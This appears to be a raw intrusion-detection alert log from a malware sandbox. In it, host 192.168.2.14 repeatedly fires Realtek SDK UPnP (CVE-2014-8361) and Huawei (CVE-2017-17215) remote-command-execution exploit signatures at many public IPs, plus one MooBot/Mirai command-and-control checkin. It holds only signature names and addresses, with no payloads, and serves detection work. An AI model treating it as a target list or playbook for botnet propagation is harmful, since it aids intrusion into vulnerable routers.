                                                07/20/24-23:05:52.450049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25831652869192.168.2.1418.33.95.3
                                                07/20/24-23:06:01.881994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3706252869192.168.2.1494.83.47.205
                                                07/20/24-23:06:00.747874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958452869192.168.2.14130.195.197.193
                                                07/20/24-23:05:40.355766TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23840652869192.168.2.14203.216.179.118
                                                07/20/24-23:05:59.385840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25865852869192.168.2.14172.65.163.145
                                                07/20/24-23:05:47.335286TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615020852869192.168.2.1449.62.131.203
                                                07/20/24-23:05:58.133891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23537852869192.168.2.14153.114.31.182
                                                07/20/24-23:05:38.461325TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4124852869192.168.2.14179.191.229.197
                                                07/20/24-23:06:08.337396TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24619852869192.168.2.14200.186.146.236
                                                07/20/24-23:05:40.471777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24821652869192.168.2.1454.177.195.84
                                                07/20/24-23:06:02.122085TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25315852869192.168.2.14211.197.210.31
                                                07/20/24-23:06:19.865859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614936652869192.168.2.1467.58.151.95
                                                07/20/24-23:05:35.352208TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5060052869192.168.2.14131.84.155.33
                                                07/20/24-23:05:59.046185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613524452869192.168.2.1412.220.195.141
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14197.112.97.107
                                                07/20/24-23:05:59.471230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5050852869192.168.2.1481.224.30.46
                                                07/20/24-23:06:01.392409TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5925452869192.168.2.14219.4.1.236
                                                07/20/24-23:06:15.983769TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093452869192.168.2.14104.101.179.225
                                                07/20/24-23:06:19.786611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5396852869192.168.2.14177.253.226.129
                                                07/20/24-23:05:40.326086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4312252869192.168.2.1454.48.74.242
                                                07/20/24-23:05:40.369944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25032852869192.168.2.14210.179.176.183
                                                07/20/24-23:06:49.853581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3830052869192.168.2.14151.13.129.218
                                                07/20/24-23:05:52.528818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3877852869192.168.2.14156.242.205.254
                                                07/20/24-23:05:52.475330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23557452869192.168.2.1475.62.163.102
                                                07/20/24-23:05:34.624854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586437215192.168.2.14197.27.127.22
                                                07/20/24-23:05:36.327719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.14115.17.56.208
                                                07/20/24-23:06:14.511508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569452869192.168.2.14217.27.61.129
                                                07/20/24-23:06:00.486746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4842452869192.168.2.14191.99.77.22
                                                07/20/24-23:06:02.018794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614206452869192.168.2.14161.224.19.168
                                                07/20/24-23:05:55.413809TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)501222466192.168.2.1415.235.203.214
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630037215192.168.2.14157.14.16.110
                                                07/20/24-23:06:01.411873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616094852869192.168.2.14204.221.55.53
                                                07/20/24-23:05:52.525575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3486452869192.168.2.1417.203.0.123
                                                07/20/24-23:05:36.574959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997637215192.168.2.1412.157.227.73
                                                07/20/24-23:05:35.520062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4003452869192.168.2.14200.51.205.131
                                                07/20/24-23:05:52.571724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24998652869192.168.2.1499.123.61.15
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732237215192.168.2.14176.171.193.242
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936237215192.168.2.14185.101.34.75
                                                07/20/24-23:05:39.384181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613365452869192.168.2.14102.139.81.245
                                                07/20/24-23:05:34.625646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938437215192.168.2.14170.233.211.253
                                                07/20/24-23:05:59.164789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4552252869192.168.2.14154.15.57.14
                                                07/20/24-23:05:56.424976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274037215192.168.2.14197.200.200.227
                                                07/20/24-23:05:56.430184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656637215192.168.2.14197.24.105.40
                                                07/20/24-23:05:37.441296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3975252869192.168.2.1468.251.134.43
                                                07/20/24-23:05:56.127169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709637215192.168.2.1441.102.87.173
                                                07/20/24-23:06:58.157771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614938452869192.168.2.14204.183.12.81
                                                07/20/24-23:06:29.529818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615435652869192.168.2.14216.202.202.133
                                                07/20/24-23:05:38.939891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926037215192.168.2.1441.215.43.147
                                                07/20/24-23:06:07.773969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4795252869192.168.2.14102.178.124.219
                                                07/20/24-23:05:44.332694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614200452869192.168.2.1459.125.137.153
                                                07/20/24-23:06:02.120842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615065852869192.168.2.14201.157.202.52
                                                07/20/24-23:06:35.355667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5787452869192.168.2.1471.126.238.212
                                                07/20/24-23:05:46.135626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790237215192.168.2.1413.230.90.211
                                                07/20/24-23:05:37.459218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3352652869192.168.2.14106.240.191.91
                                                07/20/24-23:05:57.181050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596852869192.168.2.14169.22.244.181
                                                07/20/24-23:05:39.394269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614492252869192.168.2.1418.89.154.147
                                                07/20/24-23:05:56.993408TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787252869192.168.2.149.153.76.157
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615190052869192.168.2.1413.101.20.178
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793637215192.168.2.14197.219.227.4
                                                07/20/24-23:06:02.508900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25698252869192.168.2.14168.255.68.251
                                                07/20/24-23:05:35.304036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4649052869192.168.2.14134.214.175.73
                                                07/20/24-23:05:52.516035TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24724852869192.168.2.14114.223.237.120
                                                07/20/24-23:06:02.042794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615442452869192.168.2.1472.185.216.95
                                                07/20/24-23:06:16.628763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4968452869192.168.2.14132.79.218.79
                                                07/20/24-23:05:47.086079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787037215192.168.2.14197.15.224.18
                                                07/20/24-23:06:03.480553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24582652869192.168.2.14150.217.211.82
                                                07/20/24-23:06:00.037207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5212652869192.168.2.14122.235.119.72
                                                07/20/24-23:05:36.332387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510637215192.168.2.1441.97.238.239
                                                07/20/24-23:05:37.611139TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23389852869192.168.2.14164.159.1.86
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363237215192.168.2.1441.136.144.80
                                                07/20/24-23:05:56.948371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6033652869192.168.2.14114.99.252.59
                                                07/20/24-23:05:38.137665TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614506052869192.168.2.14161.222.69.144
                                                07/20/24-23:05:58.549030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4954452869192.168.2.14165.161.227.86
                                                07/20/24-23:06:38.250934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614009452869192.168.2.1477.173.109.244
                                                07/20/24-23:06:06.363471TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23748252869192.168.2.14130.148.196.29
                                                07/20/24-23:05:59.139794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614162852869192.168.2.14178.190.0.107
                                                07/20/24-23:06:00.444049TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614705052869192.168.2.1482.244.199.195
                                                07/20/24-23:05:59.404275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5461052869192.168.2.14203.38.123.229
                                                07/20/24-23:05:39.561842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614451852869192.168.2.14180.90.7.162
                                                07/20/24-23:05:38.422868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614758852869192.168.2.1471.233.122.57
                                                07/20/24-23:06:56.433850TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24062052869192.168.2.14153.186.8.251
                                                07/20/24-23:05:36.261315TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614130652869192.168.2.14112.153.191.145
                                                07/20/24-23:05:58.403603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4514252869192.168.2.14123.159.227.193
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605437215192.168.2.14157.230.243.7
                                                07/20/24-23:05:57.960840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615439252869192.168.2.14169.13.159.45
                                                07/20/24-23:06:33.955474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5286852869192.168.2.14192.147.19.189
                                                07/20/24-23:05:34.654274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102237215192.168.2.1491.134.129.146
                                                07/20/24-23:05:35.438296TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614835252869192.168.2.14183.106.204.162
                                                07/20/24-23:06:02.066021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868052869192.168.2.1449.124.39.191
                                                07/20/24-23:06:03.111365TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4012852869192.168.2.1477.213.246.94
                                                07/20/24-23:05:36.574960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375237215192.168.2.1441.22.186.127
                                                07/20/24-23:07:19.727778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615352252869192.168.2.14177.234.19.81
                                                07/20/24-23:05:40.488770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25188052869192.168.2.1479.209.117.180
                                                07/20/24-23:05:47.804016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5012452869192.168.2.14207.158.17.11
                                                07/20/24-23:06:03.808671TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24198052869192.168.2.14178.124.97.10
                                                07/20/24-23:06:36.472084TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24209052869192.168.2.1491.134.220.118
                                                07/20/24-23:05:40.325933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286852869192.168.2.14191.244.73.243
                                                07/20/24-23:05:57.194540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3609252869192.168.2.141.71.203.54
                                                07/20/24-23:05:52.516035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4574852869192.168.2.1445.228.151.222
                                                07/20/24-23:06:01.795331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615829252869192.168.2.14208.101.156.156
                                                07/20/24-23:06:02.598486TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4976652869192.168.2.14159.56.50.124
                                                07/20/24-23:05:47.544022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4664652869192.168.2.14191.236.154.50
                                                07/20/24-23:05:56.993867TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958052869192.168.2.14153.2.64.76
                                                07/20/24-23:06:35.309569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4799452869192.168.2.1469.215.220.54
                                                07/20/24-23:05:40.462908TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25252852869192.168.2.14178.30.251.228
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837237215192.168.2.14197.37.0.126
                                                07/20/24-23:06:02.312606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721852869192.168.2.1420.251.138.185
                                                07/20/24-23:07:26.028529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4232052869192.168.2.14200.224.84.86
                                                07/20/24-23:06:14.460726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615724052869192.168.2.1486.179.103.234
                                                07/20/24-23:06:16.535822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3973252869192.168.2.14151.72.13.67
                                                07/20/24-23:05:40.361541TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25806652869192.168.2.1473.202.31.82
                                                07/20/24-23:05:38.017676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4812652869192.168.2.1496.95.169.154
                                                07/20/24-23:05:57.887085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5691652869192.168.2.14222.212.155.214
                                                07/20/24-23:05:40.361541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3572852869192.168.2.14126.55.207.112
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507037215192.168.2.1448.16.188.79
                                                07/20/24-23:06:01.336092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3769852869192.168.2.1486.158.137.16
                                                07/20/24-23:06:00.139140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3655252869192.168.2.14162.167.107.129
                                                07/20/24-23:06:17.581336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043852869192.168.2.1419.14.45.237
                                                07/20/24-23:06:19.930679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938052869192.168.2.1470.112.34.196
                                                07/20/24-23:05:56.234699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786237215192.168.2.14189.19.255.237
                                                07/20/24-23:05:52.570741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6006252869192.168.2.14155.98.10.133
                                                07/20/24-23:05:58.366780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4567652869192.168.2.14131.2.104.94
                                                07/20/24-23:05:37.440397TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25895452869192.168.2.14133.8.172.164
                                                07/20/24-23:06:10.473848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614662252869192.168.2.14115.229.116.222
                                                07/20/24-23:06:05.412182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3730252869192.168.2.14188.31.251.64
                                                07/20/24-23:05:45.996824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015237215192.168.2.1485.88.92.181
                                                07/20/24-23:05:58.898489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5015852869192.168.2.1490.96.121.212
                                                07/20/24-23:05:39.546980TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614613652869192.168.2.14103.130.0.226
                                                07/20/24-23:05:45.412130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521837215192.168.2.1441.189.208.29
                                                07/20/24-23:05:59.119988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3549052869192.168.2.14173.137.64.120
                                                07/20/24-23:06:23.359635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615097652869192.168.2.14120.240.88.154
                                                07/20/24-23:05:47.306586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614870052869192.168.2.14176.247.246.75
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558237215192.168.2.14157.185.198.1
                                                07/20/24-23:05:40.439699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6036652869192.168.2.14154.203.201.18
                                                07/20/24-23:06:55.227510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4039852869192.168.2.1459.247.240.190
                                                07/20/24-23:05:59.442578TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613592252869192.168.2.1460.161.200.238
                                                07/20/24-23:05:45.386529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492637215192.168.2.1441.222.249.94
                                                07/20/24-23:06:06.210098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613295252869192.168.2.1492.213.45.240
                                                07/20/24-23:05:39.773172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185437215192.168.2.14197.144.158.58
                                                07/20/24-23:05:46.725488TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615887452869192.168.2.1452.191.253.144
                                                07/20/24-23:06:14.645434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4305452869192.168.2.14126.165.56.151
                                                07/20/24-23:06:02.049331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613408052869192.168.2.14182.249.57.247
                                                07/20/24-23:05:37.447452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23905452869192.168.2.14137.29.148.187
                                                07/20/24-23:05:52.554753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24803052869192.168.2.1476.156.13.20
                                                07/20/24-23:06:05.488342TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23653452869192.168.2.14135.37.186.112
                                                07/20/24-23:07:03.123324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614570852869192.168.2.14135.95.234.162
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344437215192.168.2.14131.78.104.9
                                                07/20/24-23:06:17.635185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614719452869192.168.2.14165.36.32.222
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.1441.124.231.107
                                                07/20/24-23:05:58.821284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5481652869192.168.2.1419.148.221.102
                                                07/20/24-23:05:37.575243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25451452869192.168.2.1473.174.204.179
                                                07/20/24-23:05:57.943746TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23387252869192.168.2.14170.62.212.33
                                                07/20/24-23:05:36.235094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3425452869192.168.2.1417.92.216.196
                                                07/20/24-23:05:35.985482TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615196452869192.168.2.14190.147.108.124
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253237215192.168.2.14197.116.241.24
                                                07/20/24-23:06:48.642445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613912652869192.168.2.1480.232.145.96
                                                07/20/24-23:06:15.005196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5014852869192.168.2.14125.22.166.59
                                                07/20/24-23:05:58.854548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613660652869192.168.2.14189.143.163.228
                                                07/20/24-23:06:29.396094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615380652869192.168.2.14145.225.20.14
                                                07/20/24-23:05:38.569152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215052869192.168.2.1412.251.167.176
                                                07/20/24-23:05:40.435340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24852052869192.168.2.14163.35.26.213
                                                07/20/24-23:05:38.457187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455252869192.168.2.1498.249.26.162
                                                07/20/24-23:05:58.112994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614369452869192.168.2.14106.37.253.180
                                                07/20/24-23:06:12.549242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615130452869192.168.2.1434.5.253.95
                                                07/20/24-23:05:40.353037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569652869192.168.2.14193.25.57.29
                                                07/20/24-23:05:33.828884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.14197.48.133.159
                                                07/20/24-23:06:05.768387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3438852869192.168.2.14137.240.101.183
                                                07/20/24-23:05:45.424850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704037215192.168.2.14197.153.115.91
                                                07/20/24-23:06:03.249838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614083852869192.168.2.14144.226.191.60
                                                07/20/24-23:06:19.742051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613599652869192.168.2.14120.51.213.234
                                                07/20/24-23:05:59.394050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4477252869192.168.2.14161.45.96.72
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297037215192.168.2.1441.231.61.229
                                                07/20/24-23:06:51.995876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6001252869192.168.2.14115.14.197.229
                                                07/20/24-23:06:01.433779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24607252869192.168.2.148.51.102.139
                                                07/20/24-23:05:47.978388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4783452869192.168.2.1471.131.126.141
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.1441.230.134.37
